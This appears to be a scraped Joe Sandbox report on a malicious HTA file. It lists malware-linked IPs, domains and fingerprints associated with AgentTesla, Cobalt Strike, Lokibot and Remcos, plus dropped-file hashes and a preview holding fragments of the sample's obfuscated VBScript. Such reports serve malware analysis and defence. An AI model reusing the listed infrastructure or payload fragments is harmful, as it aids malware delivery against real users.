Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	seethebestthingswithgreatsituationshandletotheprogress.hta
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winHTA@20/20@2/3
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 99% Number of executed functions: 45 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 1780 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 4176 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4616 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5052 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: seethebestthingswithgreatsituationshandletotheprogress.hta

Simulations

Behavior and APIs

Time	Type	Description
02:27:59	API Interceptor	113x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
142.215.209.78	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse
	bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, SmokeLoader	Browse
	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse
	seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse
	Order_Summary.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse
	kissmegoodthingwhichgivemebestthignswithgirluaremy.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse
	bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer	Browse
	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse
	SAMPLE_PHOTO.js	Get hash	malicious	AgentTesla	Browse
208.95.112.1	DHL_Doc.9787653446578978656879764534576879764545766456.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse	ip-api.com/line/?fields=hosting
	file.exe	Get hash	malicious	Unknown	Browse	ip-api.com/line/
	file.exe	Get hash	malicious	Unknown	Browse	ip-api.com/line/
	FACTER9098767800.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	[Purchase Order] PO2411024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	file.exe	Get hash	malicious	Clipboard Hijacker	Browse	ip-api.com/line/
	XSLHv0kxy7.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	oaUNY8P657.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip.1017.filemail.com	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse	142.215.209.78
	bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, SmokeLoader	Browse	142.215.209.78
	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse	142.215.209.78
	seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	142.215.209.78
	Order_Summary.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	142.215.209.78
	kissmegoodthingwhichgivemebestthignswithgirluaremy.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	142.215.209.78
	bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer	Browse	142.215.209.78
	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	SAMPLE_PHOTO.js	Get hash	malicious	AgentTesla	Browse	142.215.209.78
ip-api.com	DHL_Doc.9787653446578978656879764534576879764545766456.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse	208.95.112.1
	file.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	file.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	paket teklif.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	FACTER9098767800.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	[Purchase Order] PO2411024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	file.exe	Get hash	malicious	Clipboard Hijacker	Browse	208.95.112.1
	XSLHv0kxy7.exe	Get hash	malicious	XWorm	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HUMBER-COLLEGECA	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse	142.215.209.78
	bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, SmokeLoader	Browse	142.215.209.78
	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse	142.215.209.78
	seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	142.215.209.78
	Order_Summary.xls	Get hash	malicious	Remcos, HTMLPhisher	Browse	142.215.209.78
	kissmegoodthingwhichgivemebestthignswithgirluaremy.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	142.215.209.78
	bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot, Strela Stealer	Browse	142.215.209.78
	Purchase order (1).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	Purchase order (2).xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	142.215.209.78
	SAMPLE_PHOTO.js	Get hash	malicious	AgentTesla	Browse	142.215.209.78
TUT-ASUS	DHL_Doc.9787653446578978656879764534576879764545766456.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse	208.95.112.1
	file.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	file.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	http://ok.clicknowvip.com	Get hash	malicious	Unknown	Browse	162.252.214.5
	paket teklif.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	FACTER9098767800.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	[Purchase Order] PO2411024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	Wire slip account payable.pif.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	file.exe	Get hash	malicious	Clipboard Hijacker	Browse	208.95.112.1
AS-COLOCROSSINGUS	greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	192.3.243.136
	Credit_DetailsCBS24312017918.xla.xlsx	Get hash	malicious	HTMLPhisher	Browse	172.245.123.3
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	192.3.243.136
	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse	192.3.22.13
	9srIKeD54O.rtf	Get hash	malicious	Unknown	Browse	192.3.101.150
	exe009.exe	Get hash	malicious	Emotet	Browse	75.127.14.170
	bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, SmokeLoader	Browse	107.172.44.178
	givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	192.3.243.136
	seemybestbeautifulgirlwhowantbestthignsenitrelifetimethingstobe.hta	Get hash	malicious	Cobalt Strike, HTMLPhisher, Lokibot	Browse	192.3.243.136
	#U3010TW-S PO#U3011PO#3311-20241118003.xls	Get hash	malicious	HTMLPhisher, SmokeLoader	Browse	107.172.44.178

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse	142.215.209.78
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	142.215.209.78
	file.exe	Get hash	malicious	LummaC	Browse	142.215.209.78
	Towered.vbs	Get hash	malicious	FormBook, GuLoader	Browse	142.215.209.78
	quote001.vbs	Get hash	malicious	GuLoader	Browse	142.215.209.78
	e-dekont_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.215.209.78
	globe_product_order_korea_buy_20_11_2024_000000000000000000.vbs	Get hash	malicious	GuLoader, Remcos	Browse	142.215.209.78
	https://docs.google.com/drawings/d/14vwfD0EyLvfyX8ls6jwkhRJmCoYW07SUFnqprqeXkTI/preview	Get hash	malicious	Unknown	Browse	142.215.209.78
	vessel details_pdf.exe	Get hash	malicious	AgentTesla	Browse	142.215.209.78
	MV BUSAN STAR - calling to discharge about 55,000Mt of aggregates.exe	Get hash	malicious	AgentTesla	Browse	142.215.209.78

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\seethebestthingsentiretimewithgreatthingswithloverkiss[1].tiff

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (381), with CRLF line terminators
Category:	dropped
Size (bytes):	142098
Entropy (8bit):	3.6737957798783647
Encrypted:	false
SSDEEP:	3072:AFdRjwsHv2A7n6J7V5VmnldvvMnKjggt5pMGwm:SdP2A7nC8nr
MD5:	2A43F3918D91622E9CCAC7889F3E6DC2
SHA1:	7D6131261E7F6A54291BD9E02EB7C985E093CFA7
SHA-256:	95F59C4235C1D4516B7D5DE5A768F0F00C4A64C73A5BE26FB26496AC5F378E9B
SHA-512:	422B39ACB1DCACC05938EE122FA614A9A429E28A6A7F7ECF8A7F8416823B0E7ADA11C28B7FE52AE1352D85FC99423FFDB16FD85EC2AC27F25A2F3ADFED7B638C
Malicious:	false
Preview:	..........F.u.n.c.t.i.o.n. .d.e.s.c.a.b.i.d.o.(.B.y.V.a.l. .e.s.p.i.n.e.t.a.,. .B.y.V.a.l. .m.a.l.h.a.d.o.,. .B.y.V.a.l. .c.o.n.u.b.i.a.l.)..... . . . .D.i.m. .d.e.s.c.o.a.l.h.o..... . . . .d.e.s.c.o.a.l.h.o. .=. .I.n.S.t.r.(.e.s.p.i.n.e.t.a.,. .m.a.l.h.a.d.o.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .d.e.s.c.o.a.l.h.o. .>. .0..... . . . . . . . .e.s.p.i.n.e.t.a. .=. .L.e.f.t.(.e.s.p.i.n.e.t.a.,. .d.e.s.c.o.a.l.h.o. .-. .1.). .&. .c.o.n.u.b.i.a.l. .&. .M.i.d.(.e.s.p.i.n.e.t.a.,. .d.e.s.c.o.a.l.h.o. .+. .L.e.n.(.m.a.l.h.a.d.o.).)..... . . . . . . . .d.e.s.c.o.a.l.h.o. .=. .I.n.S.t.r.(.d.e.s.c.o.a.l.h.o. .+. .L.e.n.(.c.o.n.u.b.i.a.l.).,. .e.s.p.i.n.e.t.a.,. .m.a.l.h.a.d.o.)..... . . . .L.o.o.p..... . . . ..... . . . .d.e.s.c.a.b.i.d.o. .=. .e.s.p.i.n.e.t.a.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...A.t.E.n.d.O.f.S.t.r.e.a.m..... . . . . . . . .R.e.a.d.S.t.d.I.n. .=. .R.e.a.d.S.t.d.I.n. .&. .

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5829
Entropy (8bit):	4.901113710259376
Encrypted:	false
SSDEEP:	96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
MD5:	7827E04B3ECD71FB3BD7BEEE4CA52CE8
SHA1:	22813AF893013D1CCCACC305523301BB90FF88D9
SHA-256:	5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
SHA-512:	D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\RES4D39.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Wed Nov 20 09:26:00 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1340
Entropy (8bit):	3.9584149742562516
Encrypted:	false
SSDEEP:	24:HrK9oPaXvQGowfaHNwKcjmfwI+ycuZhNJakSXPNnqSed:7ifQGo7OK2mo1ulJa3FqS+
MD5:	DC2DE01712622AC954D854299B71211C
SHA1:	9C54A383225B2C294C043A784690A119992A60C8
SHA-256:	75D87B205DC6983127CEFC25BB9B8D91881F77D6C5704FD8076E2D9A68D6337C
SHA-512:	BEFB737772694C0CA6E3D954827EA86B672AD16F830650F0C27BBB5465A8E83F330A91B742061DD505C0548FAF98E466FE0524077A2A5E23EA243AF51182DF5D
Malicious:	false
Preview:	L...(.=g.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........U....c:\Users\user\AppData\Local\Temp\ndpe2s1t\CSCD8BAC46370384FA881732B4F85FC96.TMP..................Q`h.#..haj(o.3LT..........7.......C:\Users\user\AppData\Local\Temp\RES4D39.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.d.p.e.2.s.1.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cdsohkt.0hm.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3yqxz5ix.u1u.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4h0kjita.4yz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kh2x5wpd.ccy.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxcn21ql.1qb.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_typn21qo.zuv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujlalfbm.aqm.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvbquj4a.30t.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xjrnsgic.mqv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xk02v1nn.r3d.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\ndpe2s1t\CSCD8BAC46370384FA881732B4F85FC96.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0908821682364493
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryRdak7YnqqayPN5Dlq5J:+RI+ycuZhNJakSXPNnqX
MD5:	516068E723FDA668616A286F10334C54
SHA1:	DE50CC4FDB37310E143801DA5ECC73E74BB4890D
SHA-256:	2EF2F1546993AE4DDC987B4724D0BE4697B6CD1E1F50AA507679BB8CB31A31D1
SHA-512:	E3764A860541513A0682B0A7CDC672F3DCD32AB77D10694C00E0DCFE4F427AE1A0C30D9C028E399518C8D1354AF82325FD411BC96E1E03260FA5840CFCF09136
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.d.p.e.2.s.1.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.d.p.e.2.s.1.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (370)
Category:	dropped
Size (bytes):	485
Entropy (8bit):	3.8401670271262036
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuRVE/0nMGHvQXReKJ8SRHy4HByCnvxr0deKRF/0LsaIy:V/DTLDfuzOXfHlysIxRuMy
MD5:	D24098E842ACDC16D68EB9FC1EB0D97D
SHA1:	A5ED59B81D7A78E4F619850C0D05F05984C282A7
SHA-256:	5A2115BB93ABACD6E4CF9C0FC15F629C527FC13513305FFAE22BA8872DB0E309
